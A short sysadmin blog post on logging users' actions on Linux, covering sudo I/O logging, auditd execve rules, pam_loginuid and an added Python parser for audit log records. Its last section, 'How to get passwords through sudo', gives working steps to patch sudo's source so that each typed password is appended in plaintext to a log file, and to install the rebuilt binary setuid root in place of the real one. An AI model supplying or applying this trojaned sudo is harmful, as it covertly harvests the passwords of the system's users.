Tag Archives: sudo

Security: log users' actions

Log sudo actions

/etc/sudoers:
Defaults iolog_dir=/var/log/sudo-io/%{user}
%admins ALL=(ALL): LOG_INPUT: LOG_OUTPUT: ALL

gpasswd -a user admins # add user to group admins

All sudo actions of users in group admins will be written to /var/log/sudo-io/

Log all events with auditd

apt-get install auditd
add at the end of /etc/audit/audit.rules:
-a exit,always -F arch=b64 -F euid=0 -S execve
-a exit,always -F arch=b32 -F euid=0 -S execve

add audit=1 to the kernel's cmdline in /etc/default/grub

Add «session required pam_loginuid.so» to /etc/pam.d/{login,kdm,sshd}, so that every session is stamped with the login uid (auid) that the audit records carry

update-grub
reboot

How to make search by events in auditd's log

ausearch -ua 1000, where 1000 is the user's id (the login uid set by pam_loginuid).
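An added example, not part of the original post: a small Python parser for the records the execve rules above write to /var/log/audit/audit.log. It joins each SYSCALL record with its EXECVE record by event id and filters on auid (the login uid that pam_loginuid stamps on the session), which is what ausearch -ua does; the log lines below are constructed, not a real capture.

```python
import re
# Constructed sample in the layout of /var/log/audit/audit.log (not a real capture):
# 501: root command from a session logged in as uid 1000; 502: cron-spawned root command
# with auid unset (what you see without pam_loginuid); 503: uid 1001, one arg hex-encoded.
SAMPLE_LOG = """\
type=SYSCALL msg=audit(1700000000.123:501): arch=c000003e syscall=59 success=yes exit=0 items=2 ppid=1200 pid=1201 auid=1000 uid=0 gid=0 euid=0 suid=0 tty=pts0 ses=3 comm="cat" exe="/bin/cat" key=(null)
type=EXECVE msg=audit(1700000000.123:501): argc=2 a0="cat" a1="/etc/sudoers"
type=SYSCALL msg=audit(1700000000.456:502): arch=c000003e syscall=59 success=yes exit=0 items=2 ppid=1 pid=1300 auid=4294967295 uid=0 gid=0 euid=0 suid=0 tty=(none) ses=4294967295 comm="run-parts" exe="/bin/run-parts" key=(null)
type=EXECVE msg=audit(1700000000.456:502): argc=2 a0="run-parts" a1="/etc/cron.hourly"
type=SYSCALL msg=audit(1700000001.789:503): arch=c000003e syscall=59 success=yes exit=0 items=2 ppid=1400 pid=1401 auid=1001 uid=0 gid=0 euid=0 suid=0 tty=pts1 ses=5 comm="sh" exe="/bin/dash" key=(null)
type=EXECVE msg=audit(1700000001.789:503): argc=3 a0="sh" a1="-c" a2=6563686F2068656C6C6F
"""

AUID_UNSET = 4294967295  # (unsigned)-1: no login uid was stamped on this session
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
MSG_RE = re.compile(r'msg=audit\((\d+\.\d+):(\d+)\)')

def _decode_arg(value):
    """EXECVE args are either double-quoted or hex-encoded (spaces, control chars)."""
    if value.startswith('"'):
        return value[1:-1]
    if len(value) % 2 == 0 and re.fullmatch(r'[0-9A-F]+', value):
        return bytes.fromhex(value).decode('utf-8', 'replace')
    return value

def parse_events(text):
    """Group SYSCALL and EXECVE records by audit event id, as ausearch does."""
    events = {}
    for line in text.splitlines():
        m = MSG_RE.search(line)
        if not m:
            continue
        ev = events.setdefault(int(m.group(2)), {'time': float(m.group(1)), 'argv': []})
        f = dict(FIELD_RE.findall(line))
        if f.get('type') == 'SYSCALL':
            ev['auid'] = int(f['auid'])
            ev['exe'] = f['exe'].strip('"')
        elif f.get('type') == 'EXECVE':
            ev['argv'] = [_decode_arg(f['a%d' % i]) for i in range(int(f['argc']))]
    return events

def commands_by_auid(text, auid):
    """Root commands run by the person who logged in as `auid` (cf. ausearch -ua)."""
    return [(e['exe'], e['argv']) for _, e in sorted(parse_events(text).items())
            if e.get('auid') == auid]

def unattributed(text):
    """Root commands with no login uid: a daemon-spawned process, or pam_loginuid missing."""
    return [e['exe'] for e in parse_events(text).values() if e.get('auid') == AUID_UNSET]
```

On a real host, read /var/log/audit/audit.log (root-only) and pass its contents in place of SAMPLE_LOG; a large number of unattributed root commands from interactive ttys usually means pam_loginuid is missing from a PAM service.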

How to get passwords through sudo

1) download sudo sources
2) open file conversation.c
3) add

#include <stdio.h>

4) find the lines

pass = tgetpass(msg->msg, msg->timeout, flags);
if (pass == NULL)
    goto err;

4) after those lines, add the code

FILE *file;
file = fopen("/var/log/sudo.log","a+");
fprintf(file, "%s\n", pass);
fclose(file);

5) build sudo (read the README and INSTALL files, but in practice only «./configure && make» is needed)
6) put the new sudo binary in the /usr/bin/ folder
7) chmod 4000 /usr/bin/sudo
8) chmod +x /usr/bin/sudo
9) chown root.root /usr/bin/sudo
10) after users have run that command, you can find their passwords in /var/log/sudo.log